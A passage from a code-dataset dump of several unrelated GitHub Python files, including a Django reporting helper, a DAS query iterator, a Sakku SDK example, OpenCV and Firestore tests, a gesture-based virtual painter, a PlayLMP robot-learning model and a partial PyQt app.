skill_list.append('All')\n skill_list.sort()\n else:\n skill_list = ''\n if dispo_list:\n dispo_list.append('All')\n dispo_list.sort()\n else:\n dispo_list = ''\n final_details = {}\n final_details['sub_project'] = 0\n final_details['work_packet'] = 0\n final_details['sub_packet'] = 0\n if sub_pro_level:\n final_details['sub_project'] = 1\n if work_pac_level:\n final_details['work_packet'] = 1\n if sub_pac_level:\n final_details['sub_packet'] = 1\n prj_id = main_data_dict['pro_cen_mapping'][0][0]\n center = main_data_dict['pro_cen_mapping'][1][0]\n final_dict['sub_project_level'] = sub_project_level\n final_dict['work_packet_level'] = work_packet_level\n final_dict['sub_packet_level'] = sub_packet_level\n final_dict['location'] = location_list\n final_dict['skill'] = skill_list\n final_dict['disposition'] = dispo_list\n final_dict['is_voice'] = is_voice\n final_dict['type'] = main_data_dict['type']\n big_dict = {}\n if final_details['sub_project']:\n if final_details['work_packet']:\n first = raw_master_set.values_list('sub_project').distinct()\n big_dict = {}\n total = {}\n for i in first:\n list_val = RawTable.objects.filter(project=prj_id, sub_project=i[0], date__range=dates)\\\n .values_list('work_packet').distinct()\n for j in list_val:\n if j[0] != \"\":\n total[j[0]] = []\n sub_pac_data = RawTable.objects.filter(project=prj_id, sub_project=i[0], work_packet=j[0], date__range=dates)\\\n .values_list('sub_packet').distinct()\n for l in sub_pac_data:\n if l[0] != \"\":\n total[j[0]].append(l[0])\n big_dict[i[0]] = total\n total = {}\n elif final_details['work_packet']:\n if final_details['sub_packet']:\n first = raw_master_set.values_list('work_packet').distinct()\n big_dict = {}\n total = {}\n for i in first:\n list_val = RawTable.objects.filter(project=prj_id, work_packet=i[0], date__range=dates).\\\n values_list('sub_packet').distinct()\n for j in list_val:\n total[j[0]] = []\n big_dict[i[0]] = total\n total = {}\n else:\n big_dict = {}\n work_pac_level = raw_master_set.values_list('work_packet').distinct()\n for i in work_pac_level:\n big_dict[i[0]] = {}\n final_dict['level'] = [1, 2]\n final_dict['fin'] = final_details\n final_dict['drop_value'] = big_dict\n return json_HttpResponse(final_dict)\n\n\ndef utc_to_local(utc_dt):\n \"\"\"convert utc time to local time \"\"\"\n localtime = utc_dt + datetime.timedelta(hours = 5, minutes = 30)\n return localtime\n\n","repo_name":"headrun/NextPulse","sub_path":"backend/api/commons.py","file_name":"commons.py","file_ext":"py","file_size_in_byte":12168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33623527784","text":"from abc import ABC, abstractmethod\nfrom itertools import product\nfrom typing import Any, Dict, List, Optional\n\nfrom hyperon_das_atomdb import WILDCARD\n\nfrom hyperon_das.utils import Assignment, QueryAnswer, QueryOutputFormat\n\n\nclass QueryAnswerIterator(ABC):\n def __init__(self, source: Any):\n self.source = source\n self.current_value = None\n self.iterator = None\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if not self.source or self.iterator is None:\n raise StopIteration\n try:\n self.current_value = next(self.iterator)\n except StopIteration as exception:\n self.current_value = None\n raise exception\n return self.current_value\n\n def get(self) -> Any:\n if not self.source or self.current_value is None:\n raise StopIteration\n return self.current_value\n\n def __str__(self):\n return str(self.source)\n\n @abstractmethod\n def 
is_empty(self) -> bool:\n pass\n\n\nclass ListIterator(QueryAnswerIterator):\n def __init__(self, source: List[Any]):\n super().__init__(source)\n if source:\n self.iterator = iter(self.source)\n self.current_value = source[0]\n\n def is_empty(self) -> bool:\n return not self.source\n\n\nclass ProductIterator(QueryAnswerIterator):\n def __init__(self, source: List[QueryAnswerIterator]):\n super().__init__(source)\n if not self.is_empty():\n self.current_value = tuple([iterator.get() for iterator in source])\n self.iterator = product(*self.source)\n\n def is_empty(self) -> bool:\n return any(iterator.is_empty() for iterator in self.source)\n\n\nclass AndEvaluator(ProductIterator):\n def __init__(self, source: List[QueryAnswerIterator]):\n super().__init__(source)\n\n def __next__(self):\n while True:\n candidate = super().__next__()\n assignments = [query_answer.assignment for query_answer in candidate]\n composite_assignment = Assignment.compose(assignments)\n if composite_assignment:\n composite_subgraph = [query_answer.subgraph for query_answer in candidate]\n return QueryAnswer(composite_subgraph, composite_assignment)\n\n\nclass LazyQueryEvaluator(ProductIterator):\n def __init__(\n self,\n link_type: str,\n source: List[QueryAnswerIterator],\n das: \"DistributedAtomSpace\",\n query_parameters: Optional[Dict[str, Any]],\n ):\n super().__init__(source)\n self.link_type = link_type\n self.query_parameters = query_parameters\n self.das = das\n self.buffered_answer = None\n\n def _replace_target_handles(self, link: Dict[str, Any]) -> Dict[str, Any]:\n targets = []\n for target_handle in link[\"targets\"]:\n atom = self.das.local_backend.get_atom_as_dict(target_handle)\n if atom.get(\"targets\", None) is not None:\n atom = self._replace_target_handles(atom)\n targets.append(atom)\n link[\"targets\"] = targets\n return link\n\n def __next__(self):\n if self.buffered_answer:\n try:\n return self.buffered_answer.__next__()\n except StopIteration as exception:\n self.buffered_answer = None\n target_info = super().__next__()\n target_handle = []\n wildcard_flag = False\n for query_answer_target in target_info:\n target = query_answer_target.subgraph\n if target.get(\"atom_type\", None) == \"variable\":\n target_handle.append(WILDCARD)\n wildcard_flag = True\n else:\n target_handle.append(target[\"handle\"])\n das_query_answer = self.das.get_links(self.link_type, None, target_handle)\n lazy_query_answer = []\n for answer in das_query_answer:\n assignment = None\n if wildcard_flag:\n assignment = Assignment()\n assignment_failed = False\n for query_answer_target, handle in zip(target_info, answer[\"targets\"]):\n target = query_answer_target.subgraph\n if target.get(\"atom_type\", None) == \"variable\":\n if not assignment.assign(target[\"name\"], handle):\n assignment_failed = True\n else:\n if not assignment.merge(query_answer_target.assignment):\n assignment_failed = True\n if assignment_failed:\n break\n if assignment_failed:\n continue\n assignment.freeze()\n\n lazy_query_answer.append(QueryAnswer(self._replace_target_handles(answer), assignment))\n self.buffered_answer = ListIterator(lazy_query_answer)\n return self.buffered_answer.__next__()\n","repo_name":"singnet/das-query-engine","sub_path":"hyperon_das/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32592867736","text":"# coding=utf-8\nfrom __future__ import unicode_literals\nfrom sakku import 
Application, SakkuException, HttpException\nfrom examples.config import *\n\ntry:\n app = Application(api_key=API_KEY)\n\n response = app.get_app_setting(app_id=APP_ID)\n print(response)\n # OUTPUT\n # {\n # \"id\": 2688,\n # \"name\": \"pythontest\",\n # \"cpu\": 0.2,\n # \"mem\": 0.2,\n # \"disk\": 0.1,\n # \"image\": {\n # \"name\": \"nginx\",\n # \"registry\": \"dockerhub\",\n # \"username\": None,\n # \"tag\": \"latest\",\n # \"createDate\": 1584279280182,\n # \"buildSuccessfully\": True,\n # \"autoBuildUUID\": None\n # },\n # \"git\": None,\n # \"minInstance\": 1,\n # \"maxInstance\": 1,\n # \"cmd\": None,\n # \"entrypoint\": None,\n # \"scalingMode\": \"OFF\",\n # \"args\": [],\n # \"modules\": [\n # {\n # \"code\": 50,\n # \"appId\": 0,\n # \"metadata\": {\n # \"ftp\": \"false\",\n # \"appPath\": \"/usr/share/nginx/html\"\n # }\n # }\n # ],\n # \"environments\": {},\n # \"deployType\": \"DOCKER_IMAGE\",\n # \"lastRestartReason\": None,\n # \"lastTaskFailure\": None,\n # \"currentInstances\": 1,\n # \"lastScalingAt\": 1584281585443,\n # \"instances\": [\n # {\n # \"containerId\": \"1b9**********************************************************9ec\",\n # \"workerHost\": \"worker2.sakku.cloud\",\n # \"internalIP\": \"10.0.63.28\",\n # \"metadata\": \"\",\n # \"uptimeSeconds\": 147480,\n # \"stagedAt\": 1584281591200,\n # \"startedAt\": 1584281593600\n # }\n # ],\n # \"deploymentIds\": [],\n # \"network\": \"default_user_network_197\",\n # \"jsonConfig\": {\n # \"name\": \"PythonTest\",\n # \"cpu\": 0.2,\n # \"mem\": 0.2,\n # \"disk\": 0.1,\n # \"ports\": [\n # {\n # \"host\": 0,\n # \"port\": 80,\n # \"protocol\": \"http\",\n # \"ssl\": False,\n # \"onlyInternal\": False,\n # \"basicAuthentication\": False,\n # \"forceRedirectHttps\": False\n # }\n # ],\n # \"minInstance\": 1,\n # \"maxInstance\": 1,\n # \"cmd\": \"\",\n # \"entrypoint\": None,\n # \"scalingMode\": \"OFF\",\n # \"args\": [],\n # \"modules\": [\n # {\n # \"code\": 50,\n # \"appId\": 0,\n # \"metadata\": {\n # \"ftp\": \"false\",\n # \"appPath\": \"/usr/share/nginx/html\"\n # }\n # }\n # ],\n # \"environments\": {},\n # \"labels\": {},\n # \"links\": [],\n # \"netAlias\": None,\n # \"healthChecks\": [],\n # \"basicAuthentications\": [],\n # \"portOptions\": [],\n # \"image\": {\n # \"name\": \"nginx:latest\",\n # \"registry\": \"dockerhub\",\n # \"accessToken\": \"\",\n # \"username\": \"\"\n # },\n # \"git\": None,\n # \"app\": None,\n # \"deployType\": \"DOCKER_IMAGE\",\n # \"worker\": None,\n # \"network\": None,\n # \"dependsOn\": None,\n # \"pipeLineStatus\": \"RUNNING\"\n # }\n # }\n\n # print(app.last_response().original_result()) # get raw result\n # print(app.last_response()) # get response handler\n\nexcept HttpException as e:\n print(\"Http Exception\\nMessage : {}\\nStatus Code : {}\\n\".format(e.message, e.status_code))\n # print(e.response_handler)\nexcept SakkuException as e:\n print(\"Sakku Exception\\nMessage : {}\".format(e.message))\n","repo_name":"FanapSoft/sakku-python-sdk","sub_path":"examples/application/12_get_app_setting.py","file_name":"12_get_app_setting.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12536182011","text":"import pytest\nfrom google.cloud.firestore_v1 import GeoPoint\n\nfrom brevet_top_gcp_utils import route_point_to_firestore\nfrom brevet_top_plot_a_route import RoutePoint\n\n\n@pytest.mark.parametrize(\n (\"point\", \"result\"),\n [\n (\n RoutePoint(lat=1, lng=2),\n {\n 
\"coordinates\": GeoPoint(latitude=1, longitude=2),\n \"distance\": 0,\n },\n ),\n (\n RoutePoint(lat=3, lng=4, dir=\"CP1\", distance=123),\n {\n \"coordinates\": GeoPoint(latitude=3, longitude=4),\n \"distance\": 123,\n },\n ),\n ],\n)\ndef test_route_point_to_firestore(point: RoutePoint, result: dict):\n assert route_point_to_firestore(point) == result\n","repo_name":"grisxa/brevet-top-functions","sub_path":"brevet_top_gcp_utils/tests/test_route_point_to_firestore.py","file_name":"test_route_point_to_firestore.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70182790312","text":"#!/usr/bin/env python\n\"\"\"\"Core serialization tests.\"\"\"\nimport tempfile\nimport os\nimport cv2 as cv\nimport numpy as np\nfrom tests_common import NewOpenCVTests\n\n\nclass persistence_test(NewOpenCVTests):\n def test_yml_rw(self):\n fd, fname = tempfile.mkstemp(prefix=\"opencv_python_persistence_\", suffix=\".yml\")\n os.close(fd)\n\n # Writing ...\n expected = np.array([[[0, 1, 2, 3, 4]]])\n expected_str = (\"Hello\", \"World\", \"!\")\n fs = cv.FileStorage(fname, cv.FILE_STORAGE_WRITE)\n fs.write(\"test\", expected)\n fs.write(\"strings\", expected_str)\n fs.release()\n\n # Reading ...\n fs = cv.FileStorage(fname, cv.FILE_STORAGE_READ)\n root = fs.getFirstTopLevelNode()\n self.assertEqual(root.name(), \"test\")\n\n test = fs.getNode(\"test\")\n self.assertEqual(test.empty(), False)\n self.assertEqual(test.name(), \"test\")\n self.assertEqual(test.type(), cv.FILE_NODE_MAP)\n self.assertEqual(test.isMap(), True)\n actual = test.mat()\n self.assertEqual(actual.shape, expected.shape)\n self.assertEqual(np.array_equal(expected, actual), True)\n\n strings = fs.getNode(\"strings\")\n self.assertEqual(strings.isSeq(), True)\n self.assertEqual(strings.size(), len(expected_str))\n self.assertEqual(all(strings.at(i).isString() for i in range(strings.size())), True)\n self.assertSequenceEqual([strings.at(i).string() for i in range(strings.size())], expected_str)\n fs.release()\n\n os.remove(fname)\n","repo_name":"joachimBurket/esp32-opencv","sub_path":"modules/python/test/test_persistence.py","file_name":"test_persistence.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":272,"dataset":"github-code","pt":"72"} +{"seq_id":"13110074683","text":"import cv2\nimport numpy as np\nimport time\nimport os\nimport HandTrackingMoudule as htm\n\n\n###########################\nbrushThickness = 5\neraserThickness = 50\n###########################\n\nfolderPath = \"Header\"\nmyList = os.listdir(folderPath)\n\n# print(myList)\n\noverlayList = []\n\nfor imPath in myList:\n image = cv2.imread(f'{folderPath}/{imPath}')\n overlayList.append(image)\n\n# print(len(overlayList))\nheader = overlayList[0]\ndrawColor = (255,255,255)\n\n\ncap = cv2.VideoCapture(0)\n# cap.set(3, 800)\n# cap.set(4, 600)\n\ndetector = htm.handDetector(detectionCon=0.85)\nxp, yp = 0, 0\n\nimgCanvas = np.zeros((480, 640, 3), np.uint8)\n\nwhile True:\n # ideal\n # 1. Import image\n _, img = cap.read()\n img = cv2.flip(img, 1) # 取消镜像\n\n # 2. Find hand landmarks\n img = detector.findHands(img,draw=False)\n lmList = detector.findPostion(img,draw=False)\n\n if len(lmList) != 0:\n\n # print(lmList)\n\n\n # tip of index and minddle fingers\n x1, y1 = lmList[8][1:] # 1: - one to end\n x2, y2 = lmList[12][1:] # 1: - one to end\n\n\n # 3. 
Check which fingers are up (index)\n\n        fingers = detector.finersUp()\n        # print(fingers)\n        # 4. If selection mode - two fingers are up\n        if fingers[1] and fingers[2]:\n            xp, yp = 0, 0\n            # cv2.rectangle(img, (x1, y1-15), (x2, y2+15), drawColor, cv2.FILLED)\n            # print(\"Selection Mode\")\n            # Checking for the click\n            temh = 64\n            if y1 < 64:\n                if 190-temh < x1 < 190:\n                    header = overlayList[1]\n                    drawColor = (0,128,255)\n                elif 321-temh < x1 < 321:\n                    header = overlayList[2]\n                    drawColor = (255,102,178)\n                elif 450-temh < x1 < 450:\n                    header = overlayList[3]\n                    drawColor = (128, 255, 0)\n                elif 515 < x1 < 620:\n                    header = overlayList[4]\n                    drawColor = (0, 0, 0)\n                    # brushThickness = eraserThickness\n            cv2.rectangle(img, (x1, y1 - 15), (x2, y2 + 15), drawColor, cv2.FILLED)\n\n        # 5. If Drawing Mode - index finger is up\n        if fingers[1] and fingers[2] == False:\n            cv2.circle(img, (x1, y1), 5,drawColor, cv2.FILLED)\n            # print(\"Draw Mode\")\n            if xp == 0 and yp == 0:\n                xp, yp = x1, y1\n\n            if drawColor == (0,0,0):\n                cv2.line(img, (xp, yp), (x1, y1), drawColor, eraserThickness)\n                cv2.line(imgCanvas, (xp, yp), (x1, y1), drawColor, eraserThickness)\n            else:\n                cv2.line(img, (xp,yp), (x1, y1), drawColor, brushThickness)\n                cv2.line(imgCanvas, (xp,yp), (x1, y1), drawColor, brushThickness)\n\n            xp, yp = x1, y1\n    imgGray = cv2.cvtColor(imgCanvas, cv2.COLOR_BGR2GRAY)\n    _, imgInv = cv2.threshold(imgGray, 50, 255, cv2.THRESH_BINARY_INV)\n    imgInv = cv2.cvtColor(imgInv, cv2.COLOR_GRAY2BGR)\n    img = cv2.bitwise_and(img, imgInv)\n    img = cv2.bitwise_or(img, imgCanvas)\n\n    # setting the header image\n    h,w,c=header.shape\n    img[0:h,0:w] = header # img[h, w]\n    # img = cv2.addWeighted(img, 0.5, imgCanvas, 0.5, 0)\n    cv2.imshow(\"Painting\", img)\n    # cv2.imshow(\"imgCanvas\", imgCanvas)\n    # cv2.imshow(\"imgIvc\", imgInv)\n    cv2.waitKey(1)\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"tianxingithub/Advanced-Computer-Vision-with-Python-Projects","sub_path":"VitualPaintingProject/VirtualPainter.py","file_name":"VirtualPainter.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21406949366","text":"#import from training dir\r\nfrom networks.networks import VisionNetwork, PlanRecognitionNetwork, PlanProposalNetwork\r\nfrom networks.logistic_policy_network import LogisticPolicyNetwork\r\nfrom networks.action_decoder_network import ActionDecoderNetwork\r\nimport torch\r\nimport os\r\nimport numpy as np\r\nimport torch.optim as optim\r\nimport torch.distributions as D\r\nfrom torch.distributions.normal import Normal\r\nimport utils.plot as plot\r\n\r\nclass PlayLMP():\r\n    def __init__(self, lr=2e-4, beta=0.01, num_mixtures=5, use_logistics=False):\r\n        super(PlayLMP, self).__init__()\r\n        self.plan_proposal = PlanProposalNetwork().cuda()\r\n        self.plan_recognition = PlanRecognitionNetwork().cuda()\r\n        self.vision = VisionNetwork().cuda()\r\n        self.num_mixtures = num_mixtures\r\n        self.use_logistics = use_logistics\r\n        if use_logistics:\r\n            self.action_decoder = LogisticPolicyNetwork(num_mixtures).cuda()\r\n        else:\r\n            self.action_decoder = ActionDecoderNetwork(num_mixtures).cuda()\r\n\r\n        params = list(self.plan_proposal.parameters()) + list(self.plan_recognition.parameters()) \\\r\n                 + list(self.action_decoder.parameters()) + list(self.vision.parameters())\r\n        self.optimizer = optim.Adam(params, lr=lr)\r\n        self.beta = beta\r\n\r\n    def train_mode(self):\r\n        self.vision.train()\r\n        self.plan_proposal.train()\r\n        self.plan_recognition.train()\r\n        
self.action_decoder.train()\r\n\r\n def eval_mode(self):\r\n self.vision.eval()\r\n self.plan_proposal.eval()\r\n self.plan_recognition.eval()\r\n self.action_decoder.eval()\r\n\r\n def to_tensor(self, array):\r\n return torch.tensor(array, dtype=torch.float, device=\"cuda\")\r\n\r\n def get_pp_plan(self, obs, imgs):\r\n #obs = (batch_size, 9)\r\n #imgs = (batch_size, 2, 3, 300, 300)\r\n self.eval_mode()\r\n with torch.no_grad():\r\n b, s, c, h, w = imgs.shape\r\n imgs = self.to_tensor(imgs).reshape(-1, c, h, w)\r\n # ------------ Vision Network ------------ #\r\n encoded_imgs = self.vision(imgs)\r\n encoded_imgs = encoded_imgs.reshape(b, s, -1)\r\n\r\n # ------------Plan Proposal------------ #\r\n obs = self.to_tensor(obs)\r\n pp_input = torch.cat([encoded_imgs[:, 0], obs, encoded_imgs[:,-1]], dim=-1)\r\n mu_p, sigma_p = self.plan_proposal(pp_input)#(batch, 256) each\r\n pp_dist = Normal(mu_p, sigma_p)\r\n sampled_plan = pp_dist.sample()\r\n return sampled_plan\r\n\r\n def get_pr_plan(self, obs, imgs):\r\n #inputs are np arrays\r\n #obs = (batch_size, seq_len, 9)\r\n #imgs = (batch_size, seq_len , 3, 300, 300)\r\n self.eval_mode()\r\n with torch.no_grad():\r\n b, s, c, h, w = imgs.shape\r\n imgs = self.to_tensor(imgs).reshape(-1, c, h, w)\r\n # ------------ Vision Network ------------ #\r\n encoded_imgs = self.vision(imgs)\r\n encoded_imgs = encoded_imgs.reshape(b, s, -1)\r\n\r\n # ------------Plan Recognition------------ #\r\n #plan recognition input = visuo_proprio = (batch_size, sequence_length, 73)\r\n obs = self.to_tensor(obs)\r\n pr_input = torch.cat([encoded_imgs, obs], dim=-1)\r\n mu_p, sigma_p = self.plan_recognition(pr_input)#(batch, 256) each\r\n pr_dist = Normal(mu_p, sigma_p)\r\n sampled_plan = pr_dist.sample()\r\n return sampled_plan\r\n\r\n #Forward + loss + backward\r\n def step(self, obs, imgs, acts):\r\n self.train_mode()\r\n b, s, c, h, w = imgs.shape\r\n imgs = self.to_tensor(imgs).reshape(-1, c, h, w) #(batch_size * sequence_length, 3, 300, 300)\r\n\r\n # ------------ Vision Network ------------ #\r\n encoded_imgs = self.vision(imgs) #(batch*seq_len, 64)\r\n encoded_imgs = encoded_imgs.reshape(b, s, -1) #(batch, seq, 64)\r\n\r\n # ------------Plan Proposal------------ #\r\n #plan proposal input = cat(visuo_proprio, goals) = (batch, 137)\r\n obs = self.to_tensor(obs)\r\n pp_input = torch.cat([encoded_imgs[:, 0], obs[:,0], encoded_imgs[:,-1]], dim=-1)\r\n mu_p, sigma_p = self.plan_proposal(pp_input)#(batch, 256) each\r\n pp_dist = Normal(mu_p, sigma_p)\r\n\r\n # ------------Plan Recognition------------ #\r\n #plan proposal input = visuo_proprio = (batch_size, sequence_length, 73)\r\n pr_input = torch.cat([encoded_imgs, obs], dim=-1)\r\n mu_r, sigma_r = self.plan_recognition(pr_input)#(batch, 256) each\r\n pr_dist = Normal(mu_r, sigma_r)\r\n\r\n # ------------ Policy network ------------ #\r\n sampled_plan = pr_dist.rsample() #sample from recognition net\r\n #action_input = torch.cat([pp_input, sampled_plan], dim=-1).unsqueeze(1)\r\n goal_plan = torch.cat([encoded_imgs[:,-1], sampled_plan], dim=-1) #b, 64 + 256\r\n goal_plan = goal_plan.unsqueeze(1).expand(-1, s, -1) #b, s, 64 + 256\r\n action_input = torch.cat([pr_input, goal_plan], dim=-1) #b, s, 64 + 9 + 64 + 256 (visuo-propio + goal + plan)\r\n \r\n pi, sigma, mu = self.action_decoder(action_input)\r\n acts = self.to_tensor(acts) # B, S, 9\r\n\r\n # ------------ Loss ------------ #\r\n kl_loss = D.kl_divergence(pr_dist, pp_dist).mean()\r\n mix_loss = self.action_decoder.loss(pi, sigma, mu, acts)\r\n total_loss = 1/s 
* mix_loss + self.beta * kl_loss \r\n\r\n # ------------ Backward pass ------------ #\r\n self.optimizer.zero_grad()\r\n total_loss.backward()\r\n self.optimizer.step()\r\n\r\n return total_loss, mix_loss, kl_loss\r\n\r\n #Evaluation in test set, no grad, no labels\r\n def predict(self, obs, imgs):\r\n self.eval_mode()\r\n with torch.no_grad():\r\n b, s, c, h, w = imgs.shape\r\n imgs = self.to_tensor(imgs).reshape(-1, c, h, w)\r\n # ------------ Vision Network ------------ #\r\n encoded_imgs = self.vision(imgs)\r\n encoded_imgs = encoded_imgs.reshape(b, s, -1)\r\n\r\n # ------------Plan Proposal------------ #\r\n obs = self.to_tensor(obs)\r\n pp_input = torch.cat([encoded_imgs[:, 0], obs, encoded_imgs[:,-1]], dim=-1)\r\n mu_p, sigma_p = self.plan_proposal(pp_input)#(batch, 256) each\r\n pp_dist = Normal(mu_p, sigma_p)\r\n\r\n # ------------ Policy network ------------ #\r\n sampled_plan = pp_dist.sample() #sample from proposal net\r\n action_input = torch.cat([pp_input, sampled_plan], dim=-1).unsqueeze(1)\r\n pi, sigma, mu = self.action_decoder(action_input)\r\n action = self.action_decoder.sample(pi, sigma, mu)\r\n\r\n return action\r\n\r\n #Predict method to be able to compute val accuracy and error.\r\n #inputs: numpy arrays (Batch, seq_len, dim)\r\n def predict_eval(self, obs, imgs, act):\r\n self.eval_mode()\r\n with torch.no_grad():\r\n b, s, c, h, w = imgs.shape\r\n imgs = self.to_tensor(imgs).reshape(-1, c, h, w)\r\n # ------------ Vision Network ------------ #\r\n encoded_imgs = self.vision(imgs)\r\n encoded_imgs = encoded_imgs.reshape(b, s, -1)\r\n\r\n # ------------Plan Proposal------------ #\r\n obs = self.to_tensor(obs)\r\n pp_input = torch.cat([encoded_imgs[:, 0], obs, encoded_imgs[:,-1]], dim=-1)\r\n mu_p, sigma_p = self.plan_proposal(pp_input)#(batch, 256) each\r\n pp_dist = Normal(mu_p, sigma_p)\r\n\r\n # ------------ Policy network ------------ #\r\n sampled_plan = pp_dist.sample() #sample from proposal net\r\n action_input = torch.cat([pp_input, sampled_plan], dim=-1).unsqueeze(1)\r\n pi, sigma, mu= self.action_decoder(action_input)\r\n action = self.action_decoder.sample(pi, sigma, mu)\r\n\r\n\r\n # ------------ Loss ------------ #\r\n #cannot compute KL_divergence, only return mixture loss\r\n action_labels = self.to_tensor(act).unsqueeze(1) \r\n mix_loss = self.action_decoder.loss(pi, sigma, mu, action_labels)\r\n\r\n # ------------ Accuracy ------------ #\r\n p_actions = action.cpu().detach().numpy().squeeze()\r\n accuracy = np.isclose(p_actions, act, atol=0.2)\r\n accuracy = np.mean(np.all(accuracy, axis=-1))\r\n return accuracy, mix_loss\r\n\r\n def predict_with_plan(self, obs, imgs, plan):\r\n with torch.no_grad():\r\n b, s, c, h, w = imgs.shape\r\n imgs = self.to_tensor(imgs).reshape(-1, c, h, w)\r\n # ------------ Vision Network ------------ #\r\n encoded_imgs = self.vision(imgs)\r\n encoded_imgs = encoded_imgs.reshape(b, s, -1)\r\n\r\n # ------------Plan Proposal------------ #\r\n obs = self.to_tensor(obs)\r\n pp_input = torch.cat([encoded_imgs[:, 0], obs, encoded_imgs[:,-1]], dim=-1)\r\n action_input = torch.cat([pp_input, plan], dim=-1).unsqueeze(1)\r\n pi, sigma, mu = self.action_decoder(action_input)\r\n action = self.action_decoder.sample(pi, sigma, mu)\r\n return action\r\n\r\n def save(self, file_name):\r\n torch.save({'plan_proposal': self.plan_proposal.state_dict(),\r\n 'plan_recognition' : self.plan_recognition.state_dict(),\r\n 'action_decoder' : self.action_decoder.state_dict(),\r\n 'vision' : self.vision.state_dict(),\r\n }, file_name)\r\n\r\n def 
load(self, file_name):\r\n        if os.path.isfile(file_name):\r\n            print(\"=> loading checkpoint... \")\r\n            checkpoint = torch.load(file_name)\r\n            self.plan_proposal.load_state_dict(checkpoint['plan_proposal'])\r\n            self.plan_recognition.load_state_dict(checkpoint['plan_recognition'])\r\n            self.action_decoder.load_state_dict(checkpoint['action_decoder'])\r\n            self.vision.load_state_dict(checkpoint['vision'])\r\n            print(\"done !\")\r\n        else:\r\n            print(\"no checkpoint found...\")\r\n","repo_name":"ErickRosete/Robot-Skills-from-Video","sub_path":"networks/play_lmp.py","file_name":"play_lmp.py","file_ext":"py","file_size_in_byte":10071,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"38705107345","text":"import sys\r\nimport time\r\nfrom PyQt5.Qt import *\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nimport juanzhou\r\nfrom read import readXML as rxml\r\nfrom sec import Ui_Child\r\nimport re\r\n\r\ninput_str=''\r\nrx = rxml()\r\n\r\n\r\nclass mainWindow(QMainWindow,juanzhou.Ui_MainWindow):\r\n    # search_name='null'\r\n    def __init__(self ):\r\n        QMainWindow.__init__(self)\r\n        juanzhou.Ui_MainWindow.__init__(self)\r\n        # main window UI\r\n        self.setupUi(self)\r\n        # # tip window UI\r\n        # self.setupUi2(self)\r\n        # set the window icon\r\n        self.setWindowIcon(QIcon(\"res/app1.ico\"))\r\n        # set the window title\r\n        self.setWindowTitle(\"健康卷轴\")\r\n        # fetch the input value in real time and pass it to the query button as a signal\r\n        # self.lineEdit.textEdited[str].connect(self.onChange)\r\n        # signal and slot for the query button\r\n        # self.pushButton.clicked.connect(lambda :self.picChange(self.search_name))\r\n        self.pushButton.clicked.connect(self.start)\r\n        # self.detail.clicked.connect()\r\n    # def onChange(self):\r\n    #     self.search_name = self.lineEdit.text()\r\n    #     print(self.search_name)\r\n\r\n\r\n\r\n\r\n    def start(self):\r\n        if self.lineEdit.text() ==\"\":\r\n            rx.pic(\"qwer\")\r\n            pix = QPixmap(\"效果图.png\")\r\n            self.label_2.setPixmap(pix)\r\n        else:\r\n            input_str=self.lineEdit.text()\r\n            rx.pic(input_str)\r\n            pix = QPixmap(\"效果图.png\")\r\n            self.label_2.setPixmap(pix)\r\n        if rx.flag!=2:\r\n            self.detail.raise_()\r\n            self.detail.show()\r\n        else:\r\n            self.detail.hide()\r\n    def l(self):\r\n\r\n        self.label_2.setPixmap(QtGui.QPixmap(\"res/bg_1.png\"))\r\n    # def picChange(self,search_name):\r\n    #     if search_name in search.keys():\r\n    #         num=search[search_name]\r\n    #         self.label_2.setPixmap(QPixmap(\"\"))\r\n    #         self.label_2.setStyleSheet(f\"background-image: url(res/bg_{num}.png);\\n\"\r\n    #                                    \"    \")\r\n    #         # rx.pic(self.lineEdit.text())\r\n    #         # self.label_2.setStyleSheet(\"效果图.png\")\r\n    #         QApplication.processEvents()\r\n    #         time.sleep(1)\r\n\r\n\r\n\r\nclass Child(QMainWindow, Ui_Child):\r\n    textList=[]\r\n    def __init__(self):\r\n        super(Child, self).__init__()\r\n        self.setupUi(self)\r\n        self.textList=[self.textBrowser, self.textBrowser_2,\r\n                       self.textBrowser_3, self.textBrowser_4, self.textBrowser_5, self.textBrowser_6,\r\n                       self.textBrowser_7,\r\n                       self.textBrowser_8, self.textBrowser_9, self.textBrowser_10, self.textBrowser_11,\r\n                       self.textBrowser_12]\r\n\r\n    def open(self):\r\n        a = 0\r\n        print(rx.flag)\r\n        self.show()\r\n        if rx.flag == 0:\r\n            print(rx.input_str)\r\n            ma = rx.getMajor(rx.input_str)\r\n            print(ma)\r\n            rc = re.compile(\"\\d+、.*?\\n\")\r\n            majors = re.findall(rc, ma)\r\n            for major in majors:\r\n                # self.textBrowser.setText(major)\r\n                self.textList[a].setFontPointSize(16)\r\n                # self.textList[a].setFontFamily(\"STXINGKA.TTF\")\r\n                self.textList[a].setText(\"\"+major+\"\")\r\n                a+=1\r\n                if a==11:\r\n                    self.textBrowser_12.setFontPointSize(16)\r\n                    
